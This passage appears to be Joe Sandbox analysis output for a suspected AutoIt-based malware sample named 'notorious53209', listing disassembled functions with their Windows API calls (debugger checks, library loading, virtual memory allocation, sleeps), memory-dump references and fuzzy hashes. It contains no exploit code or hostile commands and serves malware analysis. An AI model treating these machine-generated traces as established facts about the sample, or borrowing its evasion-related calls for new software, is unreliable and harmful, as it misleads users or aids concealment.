                                                    • Part of subcall function 00883B4C: IsDebuggerPresent.KERNEL32 ref: 00883B8C
                                                    • Part of subcall function 00883B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,009462F8,009462E0,?,?), ref: 00883BFD
                                                    • Part of subcall function 00883B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00883C81
                                                  • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 008849D2
                                                  Similarity
                                                  • API ID: InfoParametersSystem$CurrentDirectoryPointer$73666DebuggerDecodeEncodeFullNamePathPresent__lock
                                                  • String ID:
                                                  • API String ID: 1649018686-0
                                                  APIs
                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00885E27
                                                  • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000), ref: 008BE19C
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  Similarity
                                                  • API ID: __lock_file_memset
                                                  • String ID:
                                                  • API String ID: 26237723-0
                                                  APIs
                                                    • Part of subcall function 008A8D68: __getptd_noexit.LIBCMT ref: 008A8D68
                                                  • __lock_file.LIBCMT ref: 008A561B
                                                    • Part of subcall function 008A6E4E: __lock.LIBCMT ref: 008A6E71
                                                  • __fclose_nolock.LIBCMT ref: 008A5626
                                                  Similarity
                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                  • String ID:
                                                  • API String ID: 2800547568-0
                                                  APIs
                                                  • InitializeCriticalSectionEx.KERNELBASE(00000000,0093F6A8,008A9C4E,?,008A9F4B,00000000,00000FA0,00000000,0093BE28,00000008,008A9E62,00000000,00000000,?,008A9CBC,0000000D), ref: 008AA084
                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(00000000,0093F6A8,?,008A9F4B,00000000,00000FA0,00000000,0093BE28,00000008,008A9E62,00000000,00000000,?,008A9CBC,0000000D), ref: 008AA08E
                                                  Similarity
                                                  • API ID: CriticalInitializeSection$CountSpin
                                                  • String ID:
                                                  • API String ID: 4156364057-0
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,0088558F,?,?,?,?,?), ref: 008881DA
                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,0088558F,?,?,?,?,?), ref: 0088820D
                                                    • Part of subcall function 008878AD: _memmove.LIBCMT ref: 008878E9
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$_memmove
                                                  • String ID:
                                                  • API String ID: 3033907384-0
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  APIs
                                                  • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000), ref: 00885CF6
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  Similarity
                                                  • API ID: ClearVariant
                                                  • String ID:
                                                  • API String ID: 1473721057-0
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID:
                                                  • API String ID: 4104443479-0
                                                  APIs
                                                    • Part of subcall function 00884D13: FreeLibrary.KERNEL32(00000000,?), ref: 00884D4D
                                                    • Part of subcall function 008A548B: __wfsopen.LIBCMT ref: 008A5496
                                                  • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,009462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00884F6F
                                                    • Part of subcall function 00884CC8: FreeLibrary.KERNEL32(00000000), ref: 00884D02
                                                    • Part of subcall function 00884DD0: _memmove.LIBCMT ref: 00884E1A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Library$Free$Load__wfsopen_memmove
                                                  • String ID:
                                                  • API String ID: 1396898556-0
                                                  • Opcode ID: f0f22873633ad7fcfa1707f114d8137a208f6cee9a8c8e25b8c4fb38b38457a4
                                                  • Instruction ID: 3d7cccf1c7c8d265193749d49a8c6ceb1ddeb3bcba7413ef76563b7e19942468
                                                  • Opcode Fuzzy Hash: f0f22873633ad7fcfa1707f114d8137a208f6cee9a8c8e25b8c4fb38b38457a4
                                                  • Instruction Fuzzy Hash: C811C43260070AABCB10FF78D812FAE77A9FF44704F10842DF541E62C1DEB59A059B52
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ClearVariant
                                                  • String ID:
                                                  • API String ID: 1473721057-0
                                                  • Opcode ID: 8159194f724b337744dc6799f0378a9053780eb4c4ea629c78dc0cfc7a5928f1
                                                  • Instruction ID: 347d29bf417d0aa8d024b0d94d35c77cb6d2742ee80a74d930a257f499c71cf7
                                                  • Opcode Fuzzy Hash: 8159194f724b337744dc6799f0378a9053780eb4c4ea629c78dc0cfc7a5928f1
                                                  • Instruction Fuzzy Hash: 8B21FF74508341CFDB28EF54C484A1ABBE0FF85744F058969E89A87B61D731E845CB52
                                                  APIs
                                                  • ReadFile.KERNELBASE(?,?,00010000,?,00000000), ref: 00885D76
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 08e199c7ba5d5ba3c6f331a27474ae4e417439ccb2b1fc180350a71819120327
                                                  • Instruction ID: 346ec799391c137fd9fee56e92d436cd2725e1ddaa574a1596d4126110cd4c02
                                                  • Opcode Fuzzy Hash: 08e199c7ba5d5ba3c6f331a27474ae4e417439ccb2b1fc180350a71819120327
                                                  • Instruction Fuzzy Hash: 62113631204B059FE3309F15C888B66B7E9FF45764F10C92EE8AACAA50D7B1F945CB60
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID:
                                                  • API String ID: 4104443479-0
                                                  • Opcode ID: 6c5342daa69b1f4f87fc02efbf90093b039542603be8b47e74d5a7ec244eb41c
                                                  • Instruction ID: 8886a29b19b32408ea2f21149bcf2c38ef83a8e1549cb469c95b6a3bf95393ba
                                                  • Opcode Fuzzy Hash: 6c5342daa69b1f4f87fc02efbf90093b039542603be8b47e74d5a7ec244eb41c
                                                  • Instruction Fuzzy Hash: 4D018FB9600946AFC305EB2DC851D66FBAAFF9A3147148259F819C7702DB70EC21CBE1
                                                  APIs
                                                  • __lock_file.LIBCMT ref: 008A4AD6
                                                    • Part of subcall function 008A8D68: __getptd_noexit.LIBCMT ref: 008A8D68
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: __getptd_noexit__lock_file
                                                  • String ID:
                                                  • API String ID: 2597487223-0
                                                  • Opcode ID: 0aae02372a1b3f1b3f44026926d6593bd1d6fedc600c63804f0bd2c489d2806c
                                                  • Instruction ID: 77f1670846e49f12499f92f79382e5f2c2f4767c71e9f43659501151c4c24dbf
                                                  • Opcode Fuzzy Hash: 0aae02372a1b3f1b3f44026926d6593bd1d6fedc600c63804f0bd2c489d2806c
                                                  • Instruction Fuzzy Hash: 85F0F431800209DFFF51AFB88C0639F3660FF42325F084114B414EA4D1CBB88921CF62
                                                  APIs
                                                  • FreeLibrary.KERNEL32(?,?,009462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00884FDE
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  • Opcode ID: bb8c0e3da593b305ec6edae91c225b3aa35e436d0ad68215ae1cb29cf7f01a9b
                                                  • Instruction ID: ceba0b1cf1c54a5b69a144d6c7e16af6ff6130f42797fa03d4d5873190ca4462
                                                  • Opcode Fuzzy Hash: bb8c0e3da593b305ec6edae91c225b3aa35e436d0ad68215ae1cb29cf7f01a9b
                                                  • Instruction Fuzzy Hash: 38F03072509712CFCB34AF64D494812BBE1FF153293209A3EE2D6C2A11CB329844DF40
                                                  APIs
                                                  • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008A09F4
                                                    • Part of subcall function 00887D2C: _memmove.LIBCMT ref: 00887D66
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: LongNamePath_memmove
                                                  • String ID:
                                                  • API String ID: 2514874351-0
                                                  • Opcode ID: a58f6fd98879b8a47461ac0592b6d9867c59fecbbb2288d5e79bce2527b0e7f7
                                                  • Instruction ID: 9f7802f6e61f42cb898c992560f9fa3931322216d70243f548296ae21d8c0854
                                                  • Opcode Fuzzy Hash: a58f6fd98879b8a47461ac0592b6d9867c59fecbbb2288d5e79bce2527b0e7f7
                                                  • Instruction Fuzzy Hash: 91E0CD379042285BCB20E65C9C05FFA77EDEF887A0F0401B5FC0CD7309D964AD818691
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: __fread_nolock
                                                  • String ID:
                                                  • API String ID: 2638373210-0
                                                  • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                                  • Instruction ID: 955c26bd580cd69d5fc89b99fe78a29d61c66e078036cc17d01dec1604891ac9
                                                  • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                                  • Instruction Fuzzy Hash: A9E092B0114B405FD7348A24D8107E373E0FB06315F00081CF2DAC3341EBA6B8818759
                                                  APIs
                                                    • Part of subcall function 008A3457: __lock.LIBCMT ref: 008A3459
                                                  • __onexit_nolock.LIBCMT ref: 008A2EA0
                                                    • Part of subcall function 008A2EC8: RtlDecodePointer.NTDLL(?), ref: 008A2EDB
                                                    • Part of subcall function 008A2EC8: RtlDecodePointer.NTDLL ref: 008A2EE6
                                                    • Part of subcall function 008A2EC8: __realloc_crt.LIBCMT ref: 008A2F27
                                                    • Part of subcall function 008A2EC8: __realloc_crt.LIBCMT ref: 008A2F3B
                                                    • Part of subcall function 008A2EC8: RtlEncodePointer.NTDLL(00000000), ref: 008A2F4D
                                                    • Part of subcall function 008A2EC8: RtlEncodePointer.NTDLL(008BB80A), ref: 008A2F5B
                                                    • Part of subcall function 008A2EC8: RtlEncodePointer.NTDLL(00000004), ref: 008A2F67
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Pointer$Encode$Decode__realloc_crt$__lock__onexit_nolock
                                                  • String ID:
                                                  • API String ID: 3536590627-0
                                                  • Opcode ID: c29139e797ccafe31a8d1afcdf066b47098acf7bc2cf5744c030dabc409f47dd
                                                  • Instruction ID: 12605870b46d84e7efa42370b84b10c56f899da0c4356d724e4c5e0ed5a21ef0
                                                  • Opcode Fuzzy Hash: c29139e797ccafe31a8d1afcdf066b47098acf7bc2cf5744c030dabc409f47dd
                                                  • Instruction Fuzzy Hash: 7CD0EC71D412099AEB51BBAC890275DBA60BF15732F504145F114E6582CB740A425AA6
                                                  APIs
                                                  • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 00885DBF
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: 23ccb305067742b1285db303903b9de3d759935453c6a3796ae2c76cbeadb786
                                                  • Instruction ID: 42362ae14654dc33df8ccccd1dc978e49bc84892af1af551c9b61a8d46ca79e1
                                                  • Opcode Fuzzy Hash: 23ccb305067742b1285db303903b9de3d759935453c6a3796ae2c76cbeadb786
                                                  • Instruction Fuzzy Hash: 31D0C77465420CBFE710DB80DC46FA9777CD705710F100194FD0456690D6B27E509795
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: __wfsopen
                                                  • String ID:
                                                  • API String ID: 197181222-0
                                                  • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                  • Instruction ID: 54902b93528b87b659f4caceff0803e9e4d065a73cd747424abd7c20d63ed2fd
                                                  • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                  • Instruction Fuzzy Hash: F5B092B684020C7BEE012E86EC02A593F19AB45678F808020FB0C18562A673A6A0968E
                                                  APIs
                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 008C221A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: PathTemp
                                                  • String ID:
                                                  • API String ID: 2920410445-0
                                                  • Opcode ID: 895f6b6f65512ade1d1f8a7807efde0558070d855db76d276f3ac67bddba18f7
                                                  • Instruction ID: 5e520d0c1a9fba1de630ed067b1028069b414e7426b6dec5c1d933e13d7105dd
                                                  • Opcode Fuzzy Hash: 895f6b6f65512ade1d1f8a7807efde0558070d855db76d276f3ac67bddba18f7
                                                  • Instruction Fuzzy Hash: FFC04C704690199FEB15A754CDE5AA8723CFF01705F1040D57145D145199B06B40DE11
                                                  APIs
                                                  • GetLastError.KERNEL32(00000002,00000000), ref: 008ED46A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast
                                                  • String ID:
                                                  • API String ID: 1452528299-0
                                                  • Opcode ID: 46c31670aeef47717370e47323bd9fa9e7b82500c6f13422fbeb5d3a12f6c02f
                                                  • Instruction ID: c2085e53de23332a74bb611ff7c4bec1c1d4c14e9a0cdd2606ca3bec4b80fe5e
                                                  • Opcode Fuzzy Hash: 46c31670aeef47717370e47323bd9fa9e7b82500c6f13422fbeb5d3a12f6c02f
                                                  • Instruction Fuzzy Hash: 67714D342043418FC714EF29C491A6AB7E0FF99714F18496DF996DB2A2DB30ED49CB52
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                  • Instruction ID: 1dc9fdbf08c2d9f326ae3044a1ab10a9bfaaa91819811b2a15476d27f519fb32
                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                  • Instruction Fuzzy Hash: 8231C270A00109DFEB18DF58D480969F7A6FF5A304B648AA5E409DBA51DB31EDE1EF80
                                                  APIs
                                                  • Sleep.KERNELBASE(000001F4), ref: 001022B1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.358795810.0000000000100000.00000040.00001000.00020000.00000000.sdmp, Offset: 00100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_100000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                  • Instruction ID: ae1263a8c5df1df69784c9d4d00af95216a69fac0d25b7e0e4fcf69dfb227714
                                                  • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                  • Instruction Fuzzy Hash: 3FE0BF7494010E9FDB00EFE4D5496AE7BB4EF04301F100161FD0592280D77099508A62
                                                  APIs
                                                    • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
